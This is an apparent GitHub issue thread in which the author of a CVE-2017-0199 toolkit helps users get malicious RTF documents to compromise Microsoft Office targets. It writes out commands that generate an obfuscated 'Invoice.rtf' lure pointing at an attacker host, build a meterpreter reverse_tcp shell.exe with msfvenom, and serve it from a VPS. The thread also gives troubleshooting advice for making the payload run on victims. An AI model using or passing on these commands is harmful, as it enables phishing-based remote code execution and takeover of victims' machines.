What is your version of office?

[jooeji]

this is i try it. this is you try it. so why?

[bhdresh]

Hi, could you please share the command you used to generate RTF?

[jooeji]

python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://my ip/logo.doc

and the rtf opened with error that [There is not enough memory or disk space to display or print a picture] and the payload is Unable to execute successfully

[bhdresh]

This message is fine, it is expected alert.

Did you use following command to generate RTF with attacker IP address as 192.168.150.137?

python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.150.137/logo.doc

[bhdresh]

I suspect that your attacker side IP address should be 192.168.140.137 and not 192.168.150.137 if both attacker and victim you are trying are in same broadcast domain (/24 LAN).

From the screen shot you shared it looks like you might have mistyped shell location as http://192.168.150.137/shell.exe instead of http://192.168.140.137/shell.exe

[EdwardAutumn]

@bhdresh In my case,the exploit rtf worked,once the victim open the rtf,i can receive a GET request,but nothing happened after i send the HTTP request with your malicious js script that use powershell to download the shell.exe from a remote server,i'll try to use wireshark on victim's machine to see what's going on ,thanks for sharing the code.

[bhdresh]

@EdwardAutumn , thank you for your comment.

May be because the victim does not have administrator privileged to deal with powershell or the version of office is patched.

Could you please share the PCAP with me at bhdresh@gmail.com to dig in?

[fuxiaoye]

I faced the same feedback as the questioner, but I'm sure I didn't mistyped the IP address. Commands I used as below:

[bhdresh]

Hi @fuxiaoye

Could you please share the screenshots or commands which you have used?

Regards, -Bhadresh

[fuxiaoye]

root@kali:/tmp# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.1.218/logo.doc -x 1 Generating obfuscated RTF file.

Generated obfuscated Invoice.rtf successfully root@kali:/tmp# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.218 LPORT=4444 -f exe > /tmp/shell.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 333 bytes root@kali:/tmp# python cve-2017-0199_toolkit.py -M exp -e http://192.168.1.218/shell.exe -l /tmp/shell.exe Running exploit mode (Deliver HTA + Payload) - waiting for victim to connect Server Running on : 80 Received GET method from 192.168.1.192

Help~~!Thanks!

[fuxiaoye]

And there's no response in the other terminal Stops in Starting the payload handler...

[bhdresh]

Thank you @fuxiaoye

Could you please confirm that the user who opens RTF at 192.168.1.192 is having administrator privilege on system? because the pushed HTA will use powershell to download the shell.exe and to deal with powershell user need administrator privilege.

[fuxiaoye]

I built a virtual machine windows2003 on virtualbox, only has one user, the administrator

[fuxiaoye]

the office is 2010,help~please!

[bhdresh]

@fuxiaoye , try to followings,

1) create a file calc.hta with following inside it,

2) start script with following parameters,

python cve-2017-0199.py -M exp -H calc.hta

3) Open the generated RTF file on target

Please share if you are able to pop up calc.exe on target?

[fuxiaoye]

@bhdresh Sorry, not able to pop up calc.exe on target. The terminal says: root@kali:/tmp# python cve-2017-0199_toolkit.py -M exp -H calc.hta Running exploit mode (Deliver Custom HTA) - waiting for victim to connect Server Running on : 80 Received request for custom HTA from 192.168.1.192

[bhdresh]

@fuxiaoye , this indicates that the setup you are targeting is not vulnerable to CVE-2017-0199.

[fuxiaoye]

would you please share the setup of your target? like Windows version and office version.I'd be quite grateful,please

[bhdresh]

Mine is Windows 7 64bit - SP1 + Office professional plus 2013.

PS: Fresh installation of Windows 7 SP1 without any update history is not vulnerable (https://www.youtube.com/watch?v=ac6LM7WAx64)

Regards, -Bhadresh

[fuxiaoye]

Hello it's me again.This time I built a virtual machine Windows server 2008 sp1 with office 2016 as this article says vulnerable: https://nvd.nist.gov/vuln/search/results?adv_search=false&form_type=basic&results_type=overview&search_type=all&query=cve-2017-0199 Unfortunately, the result is still unsatisfactory. It's wired that the console Received GET method from 192.168.1.218, which is the attacker's local address. Help, please~~~!!!

[fuxiaoye]

I modified the network of virtual machine from NAT to bridge and the IP is normal now. But still there's no request for payload...

[bhdresh]

Please try to deliver calc.hta to ensure its vulnerable.

On 27 Apr 2017 7:17 a.m., "fuxiaoye" notifications@github.com wrote:

I modified the network of virtual machine from NAT to bridge and the IP is normal now. But still there's no request for payload...

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/bhdresh/CVE-2017-0199/issues/5#issuecomment-297600206, or mute the thread https://github.com/notifications/unsubscribe-auth/AIhKLclNDZfKCxVEO8YFmQ5YdsyEsZu_ks5r0AjegaJpZM4NEAqH .

[moaeddy]

hello bro, you've really been helpful but i am still having issue with my hta file being executed. I tested the hta file before running script command and it was ok. But i tried your hta calc and calc popup. I do not know if this has to do with hta file i am using maybe because it is download&exec . anyone with another hta file other executing calc? i will be glad if i can get to the bottom of this

Regards All.

[bhdresh]

Hi,

If you were able to pop the calc that means your setup is vulnerable and you should be able to exploit further.

If you want to deliver your custom HTA file just use -H option with -M exp. If this doesn't work check your HTA code.

If you want to deliver an exe payload, use -e and -l options with -M exp.

On 28 Apr 2017 12:45 a.m., "hostbob" notifications@github.com wrote:

hello bro, you've really been helpful but i am still having issue with my hta file being executed. I tested the hta file before running script command and it was ok. But i tried your hta calc and calc popup. I do not know if this has to do with hta file i am using maybe because it is download&exec . anyone with another hta file other executing calc? i will be glad if i can get to the bottom of this

Regards All.

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/bhdresh/CVE-2017-0199/issues/5#issuecomment-297834113, or mute the thread https://github.com/notifications/unsubscribe-auth/AIhKLYJeMPRFusqmSwri5mbRGAYCvL9-ks5r0P5LgaJpZM4NEAqH .

[moaeddy]

You mean I can use .exe payload other than .hta payload and it will run successfully? Regards

Sent from Mail.Ru app for Android Friday, 28 April 2017, 07:22AM +01:00 from Bhadresh Patel notifications@github.com :

Hi,

If you were able to pop the calc that means your setup is vulnerable and you should be able to exploit further.

If you want to deliver your custom HTA file just use -H option with -M exp. If this doesn't work check your HTA code.

If you want to deliver an exe payload, use -e and -l options with -M exp.

On 28 Apr 2017 12:45 a.m., "hostbob" < notifications@github.com > wrote:

hello bro, you've really been helpful but i am still having issue with my hta file being executed. I tested the hta file before running script command and it was ok. But i tried your hta calc and calc popup. I do not know if this has to do with hta file i am using maybe because it is download&exec . anyone with another hta file other executing calc? i will be glad if i can get to the bottom of this

Regards All.

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub < https://github.com/bhdresh/CVE-2017-0199/issues/5#issuecomment-297834113 >, or mute the thread < https://github.com/notifications/unsubscribe-auth/AIhKLYJeMPRFusqmSwri5mbRGAYCvL9-ks5r0P5LgaJpZM4NEAqH > .

— You are receiving this because you commented. Reply to this email directly, view it on GitHub , or mute the thread .

[moaeddy]

I tried the .exe payload but got this in the image below.

http://prntscr.com/f1vnsl  

using this below command

cve-2017-0199_toolkit.py -M gen -w prospers.rtf -u http://myvpsIP/logo.doc -x 1     cve-2017-0199_toolkit.py -M exp -p 72 -e http://myvpsIP/shell.exe -l shell.exe

But when tested on local machine using 2 VM (kali linux and windows 8 32bit) it works perfect, but when tried on my VPS i got the error in image above

[bhdresh]

Hi, it seems setup is working fine but payload (shell.exe) is not compatible with the target. Try to generate compatible payload.

On 28 Apr 2017 6:33 p.m., "hostbob" notifications@github.com wrote:

I tried the .exe payload but got this in the image below.

http://prntscr.com/f1vnsl

using this below command

cve-2017-0199_toolkit.py -M gen -w prospers.rtf -u http://myvpsIP/logo.doc -x 1

cve-2017-0199_toolkit.py -M exp -p 72 -e http://myvpsIP/shell.exe -l shell.exe

But when tested on local machine using 2 VM (kali linux and windows 8 32bit) it works perfect, but when tried on my VPS i got the error in image above

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/bhdresh/CVE-2017-0199/issues/5#issuecomment-298014406, or mute the thread https://github.com/notifications/unsubscribe-auth/AIhKLfpLU-9q6YblVi7vDKTBHzsS4eYlks5r0fi0gaJpZM4NEAqH .